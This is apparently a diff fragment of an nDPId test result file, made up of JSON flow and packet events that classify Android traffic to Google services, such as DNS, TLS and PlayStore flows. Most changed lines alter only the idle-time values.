+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1582454871130,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871130,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0RuJAAEAGM\/XAqAIQrcJPco\/iAFBu6HApJij0c4AQAVdDYAAAAQEICv\/\/NtHBhO\/i"} +00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871094,"flow_last_seen":1582454871131,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1582454871131,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}} +01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871075,"flow_last_seen":1582454871132,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871132,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not 
Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1582454871132,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871132,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8KYcAAHYGldms2RXKwKgCEAG7ytjkokMBL2I0XaAS6yDzNwAAAgQFZAQCCAptKuid\/\/82ywEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1582454871135,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871135,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0AphAAEAGstDAqAIQrNkVysrYAbsvYjRd5KJDAoAQAVcLdwAAAQEICv\/\/NtNtKuid"} 
+01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871042,"flow_last_seen":1582454871135,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871135,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871103,"flow_last_seen":1582454871138,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871138,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":243,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871152,"flow_last_seen":1582454871152,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871152,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1582454871152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871152,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA82rlAAEAGneLAqAIQ2O8meIDkAbvMauxuAAAAAKAC\/\/8TjwAAAgQFtAQCCAr\/\/zbXAAAAAAEDAwg="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1582454871166,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871166,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA82hIAAHUGqYnY7yZ4wKgCEAG7gOSVNE5IzGrsb6AS6yB0TQAAAgQFZAQCCArIBAje\/\/821wEDAwg="} 
+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1582454871167,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871167,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA02rpAAEAGnenAqAIQ2O8meIDkAbvMauxvlTROSYAQAVeMkAAAAQEICv\/\/NtvIBAje"} +00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":250,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871103,"flow_last_seen":1582454871175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871175,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871152,"flow_last_seen":1582454871200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871200,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871069,"flow_last_seen":1582454871207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871207,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1598,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01154{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":261,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"thread_ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","server_names":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, 
CN=www.google.com","alpn":"http\/1.1","fingerprint":"32:07:6C:9F:96:7D:CE:82:15:C6:C5:7B:49:90:53:A1:CF:80:4F:B0"}} +01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":264,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871069,"flow_last_seen":1582454871237,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871237,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871292,"flow_last_seen":1582454871292,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871292,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1582454871292,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871292,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBq9RAAEARCXbAqAIQwKgCAbUXADUALUF1Da4BAAABAAAAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAQ=="} 00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871292,"flow_last_seen":1582454871292,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871292,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1582454871294,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871294,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRfN0AAEAReF3AqAIBwKgCEAA1tRcAPWwTDa6BgAABAAEAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="} 
00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":276,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871292,"flow_last_seen":1582454871294,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871294,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871321,"flow_last_seen":1582454871321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871321,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1582454871321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871321,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8nfFAAEAG2qrAqAIQ2O8meIDmAbsuQarwAAAAAKAC\/\/\/zCgAAAgQFtAQCCAr\/\/zcBAAAAAAEDAwg="} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1582454871334,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871334,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8saEAAHUG0frY7yZ4wKgCEAG7gOY64cVhLkGq8aAS6yCKsAAAAgQFZAQCCAofL14G\/\/83AQEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1582454871335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871335,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0nfJAAEAG2rHAqAIQ2O8meIDmAbsuQarxOuHFYoAQAVei8wAAAQEICv\/\/NwUfL14G"} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871321,"flow_last_seen":1582454871339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871339,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871321,"flow_last_seen":1582454871321,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871321,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1582454871321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871321,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8nfFAAEAG2qrAqAIQ2O8meIDmAbsuQarwAAAAAKAC\/\/\/zCgAAAgQFtAQCCAr\/\/zcBAAAAAAEDAwg="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1582454871334,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871334,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8saEAAHUG0frY7yZ4wKgCEAG7gOY64cVhLkGq8aAS6yCKsAAAAgQFZAQCCAofL14G\/\/83AQEDAwg="} 
+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1582454871335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871335,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0nfJAAEAG2rHAqAIQ2O8meIDmAbsuQarxOuHFYoAQAVei8wAAAQEICv\/\/NwUfL14G"} +00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871321,"flow_last_seen":1582454871339,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871339,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871343,"flow_last_seen":1582454871343,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454871343,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1582454871343,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1582454871343,"pkt":"xiwDYGpkTGr2n\/YnCABFAABQq9VAAEARCWbAqAIQwKgCAYtpADUAPJHqlgwBAAABAAAAAAAAE3NlbWFudGljbG9jYXRpb24tcGEKZ29vZ2xlYXBpcwNjb20AAAEAAQ=="} 00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871343,"flow_last_seen":1582454871343,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454871343,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"semanticlocation-pa.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871321,"flow_last_seen":1582454871370,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1582454871370,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871321,"flow_last_seen":1582454871370,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1582454871370,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 